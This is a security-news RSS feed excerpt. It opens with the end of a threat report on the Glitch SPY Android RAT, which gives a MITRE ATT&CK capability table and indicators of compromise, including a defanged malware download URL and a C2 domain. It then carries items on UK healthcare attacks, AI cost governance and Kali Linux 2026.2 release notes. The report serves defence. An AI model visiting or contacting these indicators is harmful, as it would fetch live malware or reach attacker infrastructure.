<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Install Apps Only from Trusted Sources:</strong><br>Download apps exclusively from official platforms, such as the <a href="https://cyble.com/blog/crypto-phishing-applications-on-the-play-store/">Google Play Store</a>. Avoid third-party app stores or links received via SMS, social media, or email.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Be Cautious with Permissions and Installs:</strong><br>Never grant permissions and install an application unless you're certain of an app's legitimacy.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Watch for Phishing Pages:</strong><br>Always verify the URL and avoid suspicious links and websites that ask for sensitive information.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Enable Multi-Factor Authentication (MFA):</strong><br>Use MFA for banking and financial apps to add an extra layer of protection, even if credentials are compromised.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Report Suspicious Activity:</strong><br>If you suspect you've been targeted or infected, report the incident to your bank and local authorities immediately. If necessary, reset your credentials and perform a factory reset.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Use Mobile Security Solutions:</strong><br>Install a mobile security application that includes real-time scanning.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Keep Your Device Updated:</strong><br> Ensure your Android OS and apps are updated regularly. Security patches often address vulnerabilities exploited by malware.</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">MITRE ATT&amp;CK® Techniques</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:table --></p>
<figure class="wp-block-table">
<table class="has-fixed-layout">
<tbody>
<tr>
<td><strong>Tactic</strong></td>
<td><strong>Technique ID</strong></td>
<td><strong>Procedure</strong></td>
</tr>
<tr>
<td>Initial Access (<a href="https://attack.mitre.org/tactics/TA0027">TA0027</a>)</td>
<td>Phishing (<a href="https://attack.mitre.org/techniques/T1660/">T1660</a>)</td>
<td>Glitch SPY is distributed via phishing sites</td>
</tr>
<tr>
<td>Persistence (<a href="https://attack.mitre.org/tactics/TA0028">TA0028</a>)</td>
<td>Event Triggered Execution: Broadcast Receivers (T1624.001)</td>
<td>Glitch SPY implemented a broadcast receiver for screen capturing</td>
</tr>
<tr>
<td>Defense Evasion (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)<strong></strong></td>
<td>Impair Defenses: Prevent Application Removal (T1629.001)</td>
<td>Prevent uninstalling application</td>
</tr>
<tr>
<td>Defense Evasion (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)<strong></strong></td>
<td>Hide Artifacts: Suppress Application Icon (<a href="https://attack.mitre.org/techniques/T1628/001/">T1628.001</a>)</td>
<td>Glitch SPY hides its icon</td>
</tr>
<tr>
<td>Defense Evasion (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)</td>
<td>Masquerading: Match Legitimate Name or Location (<a href="https://attack.mitre.org/techniques/T1655/001/">T1655.001</a>)</td>
<td>Glitch SPY masquerades as a Polish rental application</td>
</tr>
<tr>
<td>Defense Evasion (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)</td>
<td>Input Injection (T1516)</td>
<td>Glitch SPY can perform actions such as Clicks, swipes, gestures, and enter text into edit fields.</td>
</tr>
<tr>
<td>Credential Access (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)</td>
<td>Abuse Accessibility Features (<a href="https://attack.mitre.org/techniques/T1453/">T1453</a>)</td>
<td>Glitch SPY abuses Accessibility service</td>
</tr>
<tr>
<td><strong> </strong></td>
<td>Input Capture: Keylogging (<a href="https://attack.mitre.org/techniques/T1417/001/">T1417.001</a>)</td>
<td>Glitch SPY includes a Keylogging module  </td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>Software Discovery  (<a href="https://attack.mitre.org/techniques/T1418/">T1418</a>)</td>
<td>Glitch SPY collects installed applications</td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>File and Directory Discovery (<a href="https://attack.mitre.org/techniques/T1420/">T1420</a>)</td>
<td>Glitch SPY can enumerate files from external storage</td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>Location Tracking (<a href="https://attack.mitre.org/techniques/T1430/">T1430</a>)</td>
<td>Glitch SPY can collect device location</td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>System Information Discovery (<a href="https://attack.mitre.org/techniques/T1426/">T1426</a>)</td>
<td>Glitch SPY can collect device information</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Archive Collected Data (<a href="https://attack.mitre.org/techniques/T1532/">T1532</a>)  </td>
<td>Glitch SPY compresses the external storage directories as a zip file before sending</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Screen Capture (<a href="https://attack.mitre.org/techniques/T1513/">T1513</a>)</td>
<td>Glitch SPY captures screen content</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Audio Capture (<a href="https://attack.mitre.org/techniques/T1429/">T1429</a>)</td>
<td>Glitch SPY can capture Audio</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Clipboard Data (T1414)</td>
<td>Malware can monitor Clipboard content</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Data from Local System (<a href="https://attack.mitre.org/techniques/T1533/">T1533</a>)</td>
<td>Malware collects encrypted files from external storage</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: Contact List (<a href="https://attack.mitre.org/techniques/T1636/003/">T1636.003</a>)</td>
<td>Malware collects contact details</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: SMS Messages (<a href="https://attack.mitre.org/techniques/T1636/004/">T1636.004</a>)</td>
<td>Glitch SPY collects SMS data</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: Accounts (<a href="https://attack.mitre.org/techniques/T1636/005/">T1636.005</a>)</td>
<td>Malware collects Account information</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: Call Log (<a href="https://attack.mitre.org/techniques/T1636/002/">T1636.002</a>)</td>
<td>Glitch SPY collects Call logs</td>
</tr>
<tr>
<td>Command &amp; Control (<a href="https://attack.mitre.org/tactics/TA0037">TA0037</a>)</td>
<td>Application Layer Protocol (<a href="https://attack.mitre.org/techniques/T1437/">T1437</a>)</td>
<td>Glitch SPY communicates with C2 over TCP</td>
</tr>
<tr>
<td>Exfiltration (<a href="https://attack.mitre.org/tactics/TA0036">TA0036</a>)</td>
<td>Exfiltration Over C2 Channel (<a href="https://attack.mitre.org/techniques/T1646/">T1646</a>)</td>
<td>Glitch SPY exfiltrates data to the C&amp;C server</td>
</tr>
<tr>
<td>Impact (<a href="https://attack.mitre.org/tactics/TA0034">TA0034</a>)</td>
<td>Data Encrypted for Impact (<a href="https://attack.mitre.org/techniques/T1471/">T1471</a>)</td>
<td>Malware encrypts all the files present on the device with the .enc extension</td>
</tr>
<tr>
<td>Impact (<a href="https://attack.mitre.org/tactics/TA0034">TA0034</a>)</td>
<td>Data Destruction (<a href="https://attack.mitre.org/techniques/T1662/">T1662</a>)</td>
<td>Glitch SPY deletes all plain-text files after encryption</td>
</tr>
</tbody>
</table>
</figure>
<p><!-- /wp:table --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Indicators of Compromise (IOCs)<strong></strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:table --></p>
<figure class="wp-block-table">
<table class="has-fixed-layout">
<tbody>
<tr>
<td><strong>Indicators</strong></td>
<td><strong>Indicator type</strong></td>
<td><strong>Description</strong></td>
</tr>
<tr>
<td>hxxps://tutaj-dompl[.]com/Tutajdom.apk</td>
<td>URL</td>
<td>Distribution URL</td>
</tr>
<tr>
<td>sportypointsrewards[.]com</td>
<td>Domain</td>
<td>C&amp;C server</td>
</tr>
<tr>
<td>80af5e921cf8a3052fe4483bb2eb15953590e72ed003ac61c0b9135575c32075</td>
<td>FileHash-SHA256</td>
<td>Glitch SPY Hash</td>
</tr>
<tr>
<td>d439475bf09af7b474cdba2c19e136a1dd38e62b088537445ac3c8e4c2d3a8b1</td>
<td>FileHash-SHA256</td>
<td>Brokewell Loader</td>
</tr>
</tbody>
</table>
</figure>
<p><!-- /wp:table --></p>
<p>The post <a rel="nofollow" href="https://cyble.com/blog/glitch-spy-rat-distributed-via-fake-polish-app/">Glitch SPY: An Emerging Android RAT Distributed Through a Fake Polish Rental App</a> appeared first on <a rel="nofollow" href="https://cyble.com/">Cyble</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[UK Healthcare Sector Records Tenfold Increase in Cyber-Attacks]]></title>
<description><![CDATA[SonicWall records 264,000 events in first five months of 2026 as UK hospitals come under siege]]></description>
<link>https://tsecurity.de/de/3635082/it-security-nachrichten/uk-healthcare-sector-records-tenfold-increase-in-cyber-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635082/it-security-nachrichten/uk-healthcare-sector-records-tenfold-increase-in-cyber-attacks/</guid>
<pubDate>Tue, 30 Jun 2026 11:37:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[SonicWall records 264,000 events in first five months of 2026 as UK hospitals come under siege]]></content:encoded>
</item>
<item>
<title><![CDATA[UK Healthcare Sector Records Tenfold Increase in Cyber-Attacks]]></title>
<description><![CDATA[SonicWall records 264,000 events in first five months of 2026 as UK hospitals come under siege This article has been indexed from www.infosecurity-magazine.com Read the original article: UK Healthcare Sector Records Tenfold Increase in Cyber-Attacks
Read more →
The post UK Healthcare Sector Recor...]]></description>
<link>https://tsecurity.de/de/3635079/it-security-nachrichten/uk-healthcare-sector-records-tenfold-increase-in-cyber-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635079/it-security-nachrichten/uk-healthcare-sector-records-tenfold-increase-in-cyber-attacks/</guid>
<pubDate>Tue, 30 Jun 2026 11:37:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>SonicWall records 264,000 events in first five months of 2026 as UK hospitals come under siege This article has been indexed from www.infosecurity-magazine.com Read the original article: UK Healthcare Sector Records Tenfold Increase in Cyber-Attacks</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/uk-healthcare-sector-records-tenfold-increase-in-cyber-attacks/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/uk-healthcare-sector-records-tenfold-increase-in-cyber-attacks/">UK Healthcare Sector Records Tenfold Increase in Cyber-Attacks</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The future of AI belongs to organizations that govern what they spend as well as what they build]]></title>
<description><![CDATA[Over the past two years, the enterprise conversation has been dominated by AI capabilities, productivity gains and adoption rates. I believe the next major conversation will be about something less exciting but far more consequential: AI economics. Not which models to use or which vendors to part...]]></description>
<link>https://tsecurity.de/de/3635004/it-security-nachrichten/the-future-of-ai-belongs-to-organizations-that-govern-what-they-spend-as-well-as-what-they-build/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635004/it-security-nachrichten/the-future-of-ai-belongs-to-organizations-that-govern-what-they-spend-as-well-as-what-they-build/</guid>
<pubDate>Tue, 30 Jun 2026 11:05:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Over the past two years, the enterprise conversation has been dominated by AI capabilities, productivity gains and adoption rates. I believe the next major conversation will be about something less exciting but far more consequential: AI economics. Not which models to use or which vendors to partner with, but whether organizations know what their AI is costing them, who is responsible for that spend and whether it is delivering the outcomes the business expected when it approved the investment.</p>



<p>Unlike traditional software licensing, AI introduces a consumption-based model where every prompt, every agent action and every inference carries a cost. A single interaction may cost only pennies. But at enterprise scale, those pennies add up to millions of interactions per month, creating a category of technology spend that is genuinely difficult to forecast, attribute or explain. In some cases, the value is obvious and measurable. In others, the investment sits in a grey area where the technology is clearly being used, but nobody can say with confidence what it has returned.</p>



<p><a href="https://www.bloomberg.com/news/articles/2026-06-02/uber-caps-usage-of-ai-tools-like-claude-code-to-cut-costs" rel="nofollow">Uber exhausted their entire 2026 AI coding budget within four months</a>. What struck me about that story was not the scale. It was the familiarity. I have worked on teams where AI was saving hours on document review and summarization every single week. The time savings were real, and everyone felt them. But the cost per interaction had never been logged, so the business case lived in people’s heads rather than in any report. The rideshare giant’s COO put it plainly: <a href="https://fortune.com/2026/05/26/uber-coo-ai-spending-tokens-claude-code/" rel="nofollow">“It’s very hard to draw a line” between rising AI costs and useful features for customers</a>. That gap between AI adoption and AI accountability is one most organizations are still navigating.</p>



<h2 class="wp-block-heading">How AI costs accumulate in the background</h2>



<p>In my experience, some of the increase in AI costs organizations cannot explain comes down to a rise in the cost per interaction that nobody planned for. The model changes, the per-token price jumps and usage continue scaling as if nothing happened.</p>



<p>A team builds a workflow on a capable, cost-efficient mid-tier model. It performs well. At some point, someone upgrades to a frontier reasoning model, either because the output felt noticeably better or simply because it was available. What nobody checks is that frontier models are dramatically more expensive per token, generate significantly more verbose responses and hit usage limits far faster. The model did not just get better. It got hungrier, and the budget absorbed that quietly.</p>



<p>I have seen this play out even at the individual level. On a personal AI subscription, switching from a mid-tier to a frontier model can exhaust a monthly message limit in a fraction of the usual time, not because the user is doing anything differently, but because a more powerful model thinks longer, responds at greater length and consumes far more tokens per interaction. The behavior of the model changes the cost profile entirely, even when the task stays the same.</p>



<p>Now multiply that across an engineering team, an operations group using an internal AI assistant and a customer-facing product, all running the upgraded model simultaneously. Nobody made a budget decision. Nobody ran a cost comparison. Someone changed a single line in a config file and the spend profile of the entire organization shifted overnight. In my experience, this is not an edge case. It is how AI cost surprises happen inside organizations today, quietly and without any paper trail.</p>



<h2 class="wp-block-heading">Smarter architecture is smarter economics</h2>



<p>The organizations handling AI economics well are making architectural decisions up front that build cost intelligence directly into how their systems operate. One of the most effective approaches I have seen is model routing, sometimes referred to as the orchestrator-subagent pattern or tiered model architecture. Rather than routing every task through the most powerful and expensive model available, you assign a lightweight model to handle routine execution and only escalate to a frontier reasoning model when the task genuinely requires it.</p>



<p>Think of it like any well-run team: a junior resource handles the day-to-day work and escalates to a senior manager only when the problem genuinely requires that level of judgment. You do not pull a senior manager into every task. You reserve that capacity for the decisions that need it. In practice, a team building an internal contract review tool might configure a lightweight model to handle the initial pass, extracting key clauses, flagging standard terms and formatting the output. When that model encounters an unusual clause requiring deeper reasoning, it escalates to a frontier model for expert-level analysis. Once resolved, execution returns to the lightweight model. The result is near-frontier quality on the hard cases at a fraction of the cost of running an advanced model across every document.</p>



<p>What I value about this approach is the discipline it forces. It requires teams to think deliberately about which tasks need the most capable model and which do not. That thinking, applied consistently, is what separates organizations that govern AI spend from those that simply absorb it.</p>



<h2 class="wp-block-heading">Governing AI means more than watching the spend</h2>



<p>I have been in rooms where a team demos an AI agent and the energy is infectious. It reads documents, drafts responses, pulls data from internal systems and hands off to the next step in the workflow. Then the question comes up: what data does this agent have access to? In most of those rooms, the answer is silence. Teams think about capability before they think about boundaries, and that silence has consequences. Without clearly defined limits, an agent can inadvertently process personally identifiable information or protected health information never approved for AI use. Regulations like GDPR, HIPAA and CCPA do not make exceptions for unintentional exposure. Beyond data, there is also the risk of prompt injection: malicious directives embedded inside a document or email that hijack what the agent does next. The organization’s liability does not change because the breach was caused by an AI agent rather than a human.</p>



<p>Access is one side of the problem. Output is the other, and in my experience, it is the one that catches organizations off guard more often. A model that hallucinates does not announce itself. It produces a confident, well-formatted answer that reads as authoritative until someone with the right knowledge examines it carefully. When that review step is missing, the output moves forward as fact. <a href="https://fingfx.thomsonreuters.com/gfx/legaldocs/znvnmqrwqpl/Alabama%2520Supreme%2520Court%2520-%2520AI.pdf" rel="nofollow">The Alabama Supreme Court sanctioned an attorney who had filed legal briefs containing inaccurate AI-generated citations, including references to cases that simply did not exist</a>. The attorney did not intend to mislead. The model was not asked to fabricate. But there was no human in the loop to catch what the model got wrong before it reached the court. That is the risk. Not that AI produces errors, but that those errors reach consequential places when no one is checking.</p>



<p>Human-in-the-loop is not a technical feature. It is a governance decision: designing workflows so that a person with the right knowledge reviews outputs for accuracy and completeness before they influence real decisions. It is also the first thing cut when teams are under pressure to move fast. Organizations that build that review step in from the start treat it not as a check on the technology but as a check on the consequences of trusting it without one.</p>



<p>Governance, cost architecture and responsible AI practice are not separate conversations. They are three dimensions of the same challenge, and the organizations that bring them together will be best positioned to scale AI with confidence. The shift from AI capability to AI economics will become one of the defining leadership conversations of the next decade. Getting governance right is not just about cost. It is about building AI that people inside and outside your organization can trust.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kali Linux 2026.2 Release (GNOME 50, KDE 6.6, Helper Scripts, APT Formats & VM Boot Tweaking)]]></title>
<description><![CDATA[It’s the final week of Q2, and Kali Linux 2026.2 is here - right on schedule ;) We have been heads down since our last release, and we are ready to share what we have been working on. This release is a mix of desktop refreshes, infrastructure improvements, and quality-of-life changes that we thin...]]></description>
<link>https://tsecurity.de/de/3633508/tools/kali-linux-20262-release-gnome-50-kde-66-helper-scripts-apt-formats-vm-boot-tweaking/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633508/tools/kali-linux-20262-release-gnome-50-kde-66-helper-scripts-apt-formats-vm-boot-tweaking/</guid>
<pubDate>Mon, 29 Jun 2026 18:25:00 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>It’s the final week of Q2, and Kali Linux 2026.2 is here - right on schedule ;) We have been heads down since our last release, and we are ready to share what we have been working on. This release is a mix of desktop refreshes, infrastructure improvements, and quality-of-life changes that we think you will appreciate.</p>
<p>The summary of the <a href="https://bugs.kali.org/changelog_page.php">changelog</a> since the <a href="https://www.kali.org/blog/kali-linux-2026-1-release/">2026.1 release from March</a> is:</p>
<ul>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#desktop-environments-updates">Desktop Environments</a></strong> - Bump to GNOME 50 and KDE Plasma 6.6</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#improved-consistency-for-services-helper-scripts">Helper Scripts Consistency</a></strong> - Consistency to our little launches at starting services</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#apt-gets-a-new-sources-format">APT Format</a></strong> - Goodbye <code>sources.list</code>, hello <code>sources.list.d/kali.source</code></li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#no-more-graphics-firmware-pre-installed-for-vm-use-cases">VM Boot Optimisation</a></strong> - Smaller initrd + faster boot times = happy virtual machine users</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#disruptive-package-updates">Reboot Warning</a></strong> - Heads-up, <code>polkit</code> and <code>xrdp</code> upgrades require a system reboot</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#linux-kernel-for-this-release-619">Kali Kernel Incoming</a></strong> - Staying with 6.19 for now, how to get 7.0 early</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#a-sneak-peek-build-scripts">Build Scripts Incoming</a></strong> - Heads-up with some changing on the way</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#new-tools-in-kali">New Tools</a></strong> - As always, various new shiny packages have been added <em>(9!)</em></li>
</ul>
<hr>
<h2>Desktop Environments Updates</h2>
<p>As we do roughly every six months, every other Kali release, our <a href="https://www.kali.org/docs/general-use/switching-desktop-environments/">desktop environments</a> get a major update. This time it’s for: <a href="https://www.kali.org/blog/kali-linux-2026-2-release/#gnome-50">GNOME</a> and <a href="https://www.kali.org/blog/kali-linux-2026-2-release/#kde-plasma-6-6">KDE Plasma</a>. Neither brings sweeping changes, but both have put real effort into <strong>refining performance and usability</strong> across the whole ecosystem.</p>
<h3>GNOME 50</h3>
<p>GNOME 50 brings usability and performance improvements across the desktop. The <strong>file manager received significant optimizations</strong>, resulting in faster thumbnail and icon loading, improved responsiveness, and reduced memory usage. The desktop also received new accessibility enhancements through a brand-new preferences window, tweaks to the screen reader, and automatic language switching.</p>
<p>Another addition is <strong>support for document annotations</strong> in the Document Viewer app, making it easier to add text notes and highlights directly to documents.</p>
<p>Here you can read more about all the changes with this new GNOME release: <a href="https://release.gnome.org/50/">GNOME 50 release announcement</a>.</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-2-release/images/gnome-50.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-2-release/images/gnome-50.png" alt="Kali + GNOME 50">
</a>
</p>

<h3>KDE Plasma 6.6</h3>
<p>KDE Plasma 6.6 focuses on improving usability and accessibility while introducing several new features, including a <strong>new on-screen keyboard</strong>, providing a better experience particularly for touch-enabled devices.</p>
<p>The <strong>Spectacle screenshot utility can now recognize and extract text</strong> directly from screenshots, making OCR functionality available from the desktop. Accessibility has also been enhanced with new color-vision support options, improvements to Zoom and Magnifier, support for Slow Keys on Wayland, and adoption of the standardized Reduced Motion setting.</p>
<p>Here you can read more about all the changes with this new Plasma release: <a href="https://kde.org/announcements/plasma/6/6.6.0/">KDE Plasma 6.6 release announcement</a>.</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-2-release/images/kde-6.6.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-2-release/images/kde-6.6.png" alt="Kali + KDE Plasma 6.6">
</a>
</p>

<h2>Improved Consistency For Services Helper Scripts</h2>
<p>To improve consistency across tools that depend on a service, we have updated our helper scripts. Previously, a tool that required a service might only let you start it (with no way to stop) - and the information displayed back was inconsistent (mixture of service status, how to access, default credentials or nothing at all). With this change, multiple packages have been updated to use these new scripts, which now handle the following tasks:</p>
<ul>
<li>Manage the service - <strong>start/stop</strong></li>
<li><strong>Check if the service is already running</strong> - avoiding starting it twice</li>
<li>Show the <strong>service status</strong></li>
<li>Show any <strong><a href="https://www.kali.org/docs/introduction/default-credentials/">default credentials</a></strong></li>
<li>Show <strong>how to access it</strong> - such as if it’s a web UI, the URL <em>(and bonus, <strong>automatically open it in the browser</strong>!)</em></li>
</ul>
<p>We also make sure that any Kali packages which include a service use <strong><code>&lt;tool&gt;-start</code></strong>/<strong><code>&lt;tool&gt;-stop</code></strong> for their command names.</p>
<p><em>Hopefully this makes the little things a little easier.</em></p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-2-release/images/kali-services.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-2-release/images/kali-services.png" alt="Kali Services Helper Scripts">
</a>
</p>

<h2>APT Gets A New Sources Format</h2>
<p>Since the beginning of time, the APT sources for Kali Linux were configured in the file <code>/etc/apt/sources.list</code>. This file tells APT from where to update your system, and it’s so fundamental that pretty much everyone (that is, Kali users) knows this file and its content:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ cat /etc/apt/sources.list
# See https://www.kali.org/docs/general-use/kali-linux-sources-list-repositories/
deb http://http.kali.org/kali kali-rolling main contrib non-free non-free-firmware
</code></pre>
<p>Well, it’s a <strong>“once in a distro lifetime” kind of thing, and here it is</strong> - <code>/etc/apt/sources.list</code> is retired, in favor of the new file <code>/etc/apt/sources.list.d/kali.sources</code>:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ cat /etc/apt/sources.list.d/kali.sources
# See https://www.kali.org/docs/general-use/kali-apt-sources/
Types: deb
URIs: http://http.kali.org/kali/
Suites: kali-rolling
Components: main contrib non-free non-free-firmware
Signed-By: /usr/share/keyrings/kali-archive-keyring.gpg
</code></pre>
<p><strong>All the freshly-installed systems will be configured</strong> as such. <strong>Existing systems won’t be changed</strong>. Both files are equivalent and work just the same. However, in the near future, APT will warn if the old file is in use, and will suggest modernizing it.</p>
<p>Note that, for those in the know, this isn’t anything new: both formats have existed for a long time now, and you could use either one or the other. What’s happening is that the <em>default</em> is slowly changing, from the <strong>old “one-line-style”</strong> to the <strong>new “deb822-style”</strong>. This is happening in Debian and in Debian-derivatives like Ubuntu. Kali is just following suit.</p>
<p>And for the curious, there’s a very complete and detailed manual page:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ man sources.list
</code></pre>
<h2>No More Graphics Firmware Pre-installed For VM Use-cases</h2>
<p>Kali has had a long tradition of pre-installing a lot of firmware in its images. The upside is that users didn’t need to know what firmware they needed to install for their hardware to work: it was already there. And the downside, obviously, was that all the firmware that wasn’t needed was nevertheless installed and taking space for nothing. </p>
<p>It worked for us so far, in the sense that we don’t get too many bug reports related to missing firmware. But lately the changing landscape of <em>graphics firmware</em> forced us to re-evaluate this decision.</p>
<p>The issue with graphics firmware is that it just keeps growing bigger, and right now having it installed for <a href="https://www.kali.org/docs/general-use/install-nvidia-drivers-on-kali-linux/">NVidia</a>, AMD and Intel GPUs takes almost 300 MB. But what’s even worse: some bits and pieces of these firmware packages need to be loaded very early, and therefore they are also installed in the initrd (note: the initrd, or initramfs, is this “minimal” system that is loaded early on by the kernel at boot time). And lately, the Kali initrd peaked at around 200 MB, mainly due to graphics firmware. What does that mean in practice? A bigger initrd means slower boot time, and can potentially fill up your <code>/boot</code> partition if ever it’s too small.</p>
<p>So we thought we could improve the situation for VM users here: the vast majority probably don’t need graphics firmware, ever. The only use-case we can think of is a VM with a dedicated GPU + GPU passthrough enabled. If you’re in this case, you might need graphics firmware.</p>
<p>So, what changed in practice, you may ask?</p>
<ul>
<li><strong><a href="https://www.kali.org/get-kali/#kali-virtual-machines">Pre-built VM images</a> don’t come with graphics firmware anymore</strong></li>
<li><a href="https://www.kali.org/get-kali/#kali-installer-images"><strong>Installer images</strong></a> now detect if installation happens <strong>in a VM</strong>, and in that case <strong>graphics firmware is not installed</strong></li>
</ul>
<p>As a result, the <strong>initrd is down to 60 MB for VM users, and the boot time is cut by ~3x</strong> (tested for QEMU VM on a Linux host, your mileage may vary). That’s a massive improvement in boot time.</p>
<p>For baremetal users: nothing changed, so you still get a 200 MB initrd with all graphics firmware pre-installed. If you’d like to optimize, it’s on you to uninstall the firmware that you don’t need. A word of caution though: make sure to know what you’re doing, because removing graphics firmware that is <em>needed</em> might leave you with a <a href="https://www.kali.org/docs/troubleshooting/graphics-issues-on-bare-metal-installation/">system without graphics after reboot</a>.</p>
<h2>Disruptive Package Updates</h2>
<p>We’ve got some slightly disruptive updates in this release.</p>
<p><strong>polkit: a reboot is required</strong></p>
<p>The update of the <code>polkitd</code> package requires a reboot, otherwise <em>trying to start GUI applications as root will fail with cryptic error messages</em>.</p>
<p>There’s an indication of this <strong>reboot requirement</strong> in the output of <code>apt full-upgrade</code>, when the <code>polkitd</code> package is updated. It’s just <strong>not very obvious</strong>, the hint is buried with the rest of the logs:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ sudo apt update &amp;&amp; sudo apt full-upgrade
[...]
Setting up libpolkit-gobject-1-0:amd64 (127+really127-0kali1)…
Setting up libpolkit-agent-1-0:amd64 (127+really127-0kali1)…
Setting up polkitd (127+really127-0kali1)…
Upgrading to this polkitd version requires a reboot, please reboot the system when convenient.
Created symlink '/etc/systemd/system/sockets.target.wants/polkit-agent-helper.socket' → '/usr/lib/systemd/system/polkit-agent-helper.socket'.
[...]
</code></pre>
<p>After a reboot, and if ever you still can’t run applications as root, make sure that <code>polkit-agent-helper</code> is started:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ sudo systemctl enable --now polkit-agent-helper.socket
</code></pre>
<p>If you’re still having issues, reach out on our <a href="https://bugs.kali.org/">bug tracker</a>.</p>
<hr>
<p><strong>xrdp: a reboot is required</strong></p>
<p>In this Kali release, we updated <code>xrdp</code> and <code>xorgxrdp</code> to the <code>v0.10</code> series. <a href="https://www.kali.org/docs/general-use/xfce-with-rdp/">xrdp</a> is an open-source Remote Desktop Protocol server: you might use it if you connect to your Kali instance remotely. <em>If you’re an xrdp user, you’ll need to reboot after this upgrade</em>.</p>
